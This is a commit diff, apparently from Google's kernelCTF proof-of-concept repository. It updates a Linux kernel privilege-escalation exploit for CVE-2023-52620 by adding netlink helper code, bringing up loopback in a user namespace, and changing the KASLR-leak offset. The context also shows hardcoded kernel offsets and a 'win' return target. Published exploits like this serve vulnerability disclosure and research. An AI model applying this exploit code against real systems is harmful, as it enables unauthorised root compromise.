update exploit

google · Jul 22, 2024 · 5d5c053 · 5d5c053
1 parent 88abd10
commit 5d5c053
Show file tree

Hide file tree

Showing 3 changed files with 276 additions and 2 deletions.
diff --git a/pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/exploit b/pocs/linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/exploit
diff --git a/.../linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/exploit.c b/.../linux/kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/exploit.c
@@ -26,6 +26,8 @@
 #include <libnftnl/rule.h>
 #include <libnftnl/expr.h>
 
+#include "netlink_utils.h"
+
 #define BUF_SIZE        0x1000 * 0x100
 
 #define FIND_TASK_BY_VPID                           0x1bbe60
@@ -96,6 +98,47 @@ void set_affinity(int cpuid){
     }
 }
 
+/*
+ *	Add a network interface.
+ *	Equivalent to `ip link add ...`.
+ */
+int net_if(char *type, int n, int opt) {
+
+    struct nlmsghdr *msg;
+    struct nlattr *opts;
+    struct ifinfomsg ifinfo = {};
+    char name[0x100] = { 0 };
+    int sk;
+
+    strcpy(name, type);
+
+    if (n >= 0)
+        snprintf(name, sizeof(name), "%s-%d", type, n);
+
+    // Initalize a netlink socket and allocate a nlmsghdr
+    sk = nl_init_request(RTM_NEWLINK, &msg, NLM_F_REQUEST|NLM_F_CREATE);
+    if (!sk) {
+        perror("nl_init_request()");
+        return -1;
+    }
+
+    ifinfo.ifi_family = AF_UNSPEC;
+    ifinfo.ifi_type = PF_NETROM;
+    ifinfo.ifi_index = 0;
+    ifinfo.ifi_flags = opt;
+    ifinfo.ifi_change = 1;
+
+    nlmsg_append(msg, &ifinfo, sizeof(ifinfo), NLMSG_ALIGNTO);
+
+    nla_put_string(msg, IFLA_IFNAME, name);
+    opts = nla_nest_start(msg, IFLA_LINKINFO);
+    nla_put_string(msg, IFLA_INFO_KIND, type);
+    nla_nest_end(msg, opts);
+
+    // Send the netlink message and deallocate resources
+    return nl_complete_request(sk, msg);
+}
+
 void write_file(const char *filename, char *text) {
     int fd = open(filename, O_RDWR | O_CREAT, 0600);
 
@@ -118,6 +161,8 @@ void new_ns(void) {
     write_file("/proc/self/uid_map", buffer);
     snprintf(buffer, sizeof(buffer), "0 %d 1", gid);
     write_file("/proc/self/gid_map", buffer);
+
+    net_if("lo", -1, IFF_UP);
 }
 
 uint64_t _user_rip = (uint64_t) win;
@@ -623,8 +668,8 @@ void leak_kaslr()
     size_t temp_kbase[0x8] = {0};
     for (int i = 0; i < 0x8; i++)
     {
-        // temp_kbase[i] = prefetch(0) - 0x1600000;
-        temp_kbase[i] = prefetch(0) - 0x100000;
+        temp_kbase[i] = prefetch(0) - 0x1600000;
+        // temp_kbase[i] = prefetch(0) - 0x100000;
     }
     kbase = mostFrequent(temp_kbase, 8);
     printf("choose kbase 0x%lx\n", kbase);

diff --git a/.../kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/netlink_utils.h b/.../kernelctf/CVE-2023-52620_lts_cos_mitigation/exploit/mitigation-v3-6.1.55/netlink_utils.h
@@ -0,0 +1,229 @@
+/*
+ *	Utils used to communicate with the kernel via Netlink.
+ *	Useful for static linking.
+ */
+
+#include <linux/netlink.h>
+#include <linux/rtnetlink.h>
+#include <linux/if_addr.h>
+#include <linux/pkt_sched.h>
+
+#define PAGE_SIZE 0x1000
+#define NL_AUTO_SEQ	0
+#define NL_AUTO_PID	0
+
+void *nlmsg_tail(const struct nlmsghdr *msg)
+{
+	return (unsigned char *)msg + NLMSG_ALIGN(msg->nlmsg_len);
+}
+
+void *nlmsg_data(const struct nlmsghdr *msg)
+{
+	return NLMSG_DATA(msg);
+}
+
+int nlmsg_datalen(const struct nlmsghdr *msg)
+{
+	return msg->nlmsg_len - NLMSG_HDRLEN;
+}
+
+struct nlmsghdr *nlmsg_alloc(void)
+{
+	struct nlmsghdr *msg;
+
+	msg = calloc(1, 0x1000);
+	if (!msg)
+		return NULL;
+
+	msg->nlmsg_len = NLMSG_ALIGN(NLMSG_LENGTH(0));
+	return msg;
+}
+
+struct nlmsghdr *nlmsg_init(int type, int flags)
+{
+	struct nlmsghdr *msg;
+
+	msg = nlmsg_alloc();
+	if (!msg)
+		return NULL;
+
+	msg->nlmsg_type  = type;
+	msg->nlmsg_flags = flags;
+	msg->nlmsg_seq   = NL_AUTO_SEQ;
+	msg->nlmsg_pid   = NL_AUTO_PID;
+
+	return msg;
+}
+
+void nlmsg_free(struct nlmsghdr *msg)
+{
+	free(msg);
+}
+
+int nl_init_request(int type, struct nlmsghdr **msg, int flags)
+{
+	int sk;
+	struct nlmsghdr *n;
+
+	sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
+	if (sk < 0)
+		return -1;
+
+	n = nlmsg_init(type, flags);
+	if (!n) {
+		close(sk);
+		return -1;
+	}
+
+	*msg = n;
+	return sk;
+}
+
+void *nlmsg_reserve(struct nlmsghdr *msg, size_t len, int pad)
+{
+	char *data = (char *)msg;
+	size_t tlen;
+
+	tlen = NLMSG_ALIGN(len);
+	data += msg->nlmsg_len;
+	msg->nlmsg_len += tlen;
+
+	if (tlen > len)
+		memset(data + len, 0, tlen - len);
+
+	return data;
+}
+
+int nlmsg_append(struct nlmsghdr *msg, void *data, size_t len, int pad)
+{
+	void *tmp;
+
+	tmp = nlmsg_reserve(msg, len, pad);
+	if (tmp == NULL)
+		return -1;
+
+	memcpy(tmp, data, len);
+	return 0;
+}
+
+int nl_sendmsg(int sk, struct nlmsghdr *msg)
+{
+	struct iovec iov = {};
+	struct msghdr hdr = {};
+
+	if (sk < 0)
+        	return -1;
+
+	iov.iov_base = (void *)msg;
+        /*
+	 *	Here add NLMSG_GOODSIZE (0xec0) to the total message length
+	 *	to be sure the msg in netlink_alloc_large_skb() is allocated using vmalloc():
+         *      https://elixir.bootlin.com/linux/v6.1/source/net/netlink/af_netlink.c#L1190
+	 *	Useful to reduce noise in kmalloc-512 slabs.
+	 */
+	iov.iov_len = msg->nlmsg_len + 0xec0;
+
+	hdr.msg_name = NULL;
+	hdr.msg_namelen = sizeof(struct sockaddr_nl);
+	hdr.msg_iov = &iov;
+	hdr.msg_iovlen = 1;
+
+	return sendmsg(sk, &hdr, 0);
+}
+
+int nl_complete_request(int sock, struct nlmsghdr *msg)
+{
+	int ret;
+
+	ret = nl_sendmsg(sock, msg);
+	nlmsg_free(msg);
+	close(sock);
+
+	return ret;
+}
+
+void *nla_data(const struct nlattr *nla)
+{
+	return (char *)nla + NLA_HDRLEN;
+}
+
+int nla_attr_size(int payload)
+{
+	return NLA_HDRLEN + payload;
+}
+
+int nla_total_size(int payload)
+{
+	return NLA_ALIGN(nla_attr_size(payload));
+}
+
+int nla_padlen(int payload)
+{
+	return nla_total_size(payload) - nla_attr_size(payload);
+}
+
+struct nlattr *nla_reserve(struct nlmsghdr *msg, int attrtype, int attrlen)
+{
+	struct nlattr *nla;
+
+	nla = (struct nlattr *)nlmsg_tail(msg);
+	nla->nla_type = attrtype;
+	nla->nla_len = nla_attr_size(attrlen);
+
+	memset((unsigned char *) nla + nla->nla_len, 0, nla_padlen(attrlen));
+
+	msg->nlmsg_len = NLMSG_ALIGN(msg->nlmsg_len) + nla_total_size(attrlen);
+	return nla;
+}
+
+int nla_put(struct nlmsghdr *msg, int attrtype, int datalen, const void *data)
+{
+	struct nlattr *nla;
+
+	nla = nla_reserve(msg, attrtype, datalen);
+	if (!nla)
+        	return -1;
+
+	memcpy(nla_data(nla), data, datalen);
+	return 0;
+}
+
+int nla_put_u32(struct nlmsghdr *msg, int attrtype, uint32_t value)
+{
+	return nla_put(msg, attrtype, sizeof(uint32_t), &value);
+}
+
+int nla_put_string(struct nlmsghdr *msg, int attrtype, const char *str)
+{
+	return nla_put(msg, attrtype, strlen(str) + 1, str);
+}
+
+int nla_put_nested(struct nlmsghdr *msg, int attrtype, const struct nlmsghdr *nested)
+{
+	return nla_put(msg, attrtype, nlmsg_datalen(nested), nlmsg_data(nested));
+}
+
+struct nlattr *nla_nest_start(struct nlmsghdr *msg, int attrtype)
+{
+	struct nlattr *start = (struct nlattr *)nlmsg_tail(msg);
+
+	if (nla_put(msg, NLA_F_NESTED | attrtype, 0, NULL) < 0)
+		return NULL;
+
+	return start;
+}
+
+int nla_nest_end(struct nlmsghdr *msg, struct nlattr *start)
+{
+	size_t pad, len;
+
+	len = (char *)nlmsg_tail(msg) - (char *)start;
+	start->nla_len = len;
+
+	pad = NLMSG_ALIGN(msg->nlmsg_len) - msg->nlmsg_len;
+	if (pad > 0) {
+		if (!nlmsg_reserve(msg, pad, 0))
+            return -1;
+	}
+	return 0;
+}